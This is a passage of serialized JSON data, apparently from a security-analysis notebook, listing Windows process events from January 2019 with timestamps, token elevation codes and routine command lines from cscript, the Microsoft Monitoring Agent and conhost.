05:15:16.893\",\"2019-01-15 05:15:16.967\",\"2019-01-15 05:15:17.020\",\"2019-01-15 05:15:17.077\",\"2019-01-15 05:15:17.127\",\"2019-01-15 05:15:17.137\",\"2019-01-15 05:15:17.217\",\"2019-01-15 05:15:17.220\",\"2019-01-15 05:15:17.257\",\"2019-01-15 05:15:17.363\",\"2019-01-15 05:15:17.410\",\"2019-01-15 05:15:17.457\",\"2019-01-15 05:15:17.493\",\"2019-01-15 05:15:17.520\",\"2019-01-15 05:15:17.570\",\"2019-01-15 05:15:17.580\",\"2019-01-15 05:15:17.650\",\"2019-01-15 05:15:18.080\",\"2019-01-15 05:15:18.147\",\"2019-01-15 05:15:18.230\",\"2019-01-15 05:15:18.287\",\"2019-01-15 05:15:18.300\",\"2019-01-15 05:15:18.320\",\"2019-01-15 05:15:18.337\",\"2019-01-15 05:15:18.403\",\"2019-01-15 05:15:18.450\",\"2019-01-15 05:15:18.500\",\"2019-01-15 05:15:18.547\",\"2019-01-15 05:15:18.553\",\"2019-01-15 05:15:18.630\",\"2019-01-15 05:15:18.670\",\"2019-01-15 05:15:18.707\",\"2019-01-15 05:15:18.770\",\"2019-01-15 05:15:18.820\",\"2019-01-15 05:15:18.867\",\"2019-01-15 05:15:18.917\",\"2019-01-15 05:15:18.967\",\"2019-01-15 05:15:19.010\",\"2019-01-15 05:15:19.060\",\"2019-01-15 05:15:19.127\",\"2019-01-15 05:15:19.180\",\"2019-01-15 05:15:19.223\",\"2019-01-15 05:15:19.337\",\"2019-01-15 05:15:19.403\",\"2019-01-15 05:15:19.447\",\"2019-01-15 05:15:19.490\",\"2019-01-15 05:15:19.537\",\"2019-01-15 05:15:19.583\",\"2019-01-15 05:15:19.617\",\"2019-01-15 04:23:43.103\",\"2019-01-15 04:28:01.517\",\"2019-01-15 05:15:20.623\",\"2019-01-15 04:28:33.090\",\"2019-01-15 04:42:25.437\",\"NaN\",\"2019-01-15 05:15:04.507\",\"2019-01-15 05:15:10.817\",\"2019-01-15 05:15:14.453\",\"2019-01-15 04:35:15.673\",\"NaN\",\"2019-01-15 04:43:05.240\",\"2019-01-15 04:43:05.253\",\"2019-01-15 04:44:37.180\",\"2019-01-15 04:44:37.193\",\"NaN\",\"2019-01-15 05:15:03.543\",\"2019-01-15 05:15:03.550\",\"2019-01-15 05:15:03.850\"],\"TimeGenerated\":{\"__ndarray__\":\"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\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[369]},\"TokenElevationType\":[\"NaN\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"NaN\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"NaN\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"NaN\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"NaN\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"NaN\",\"%%1936\",\"%%1936\",\"%%1936\"],\"__cmd_line$$\":[\"nan\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\Desir...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\Desir...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\Desir...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\Desir...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\Desir...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\Desir...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\Desir...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\Desir...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateCon...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\Desir...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\Desir...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\Desir...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\Desir...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\Desir...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\Desir...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\Desir...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\Desir...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\Desir...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\Desir...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\Desir...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\Desir...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\Desir...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\Desir...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\Desir...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\Desir...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\Desir...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo 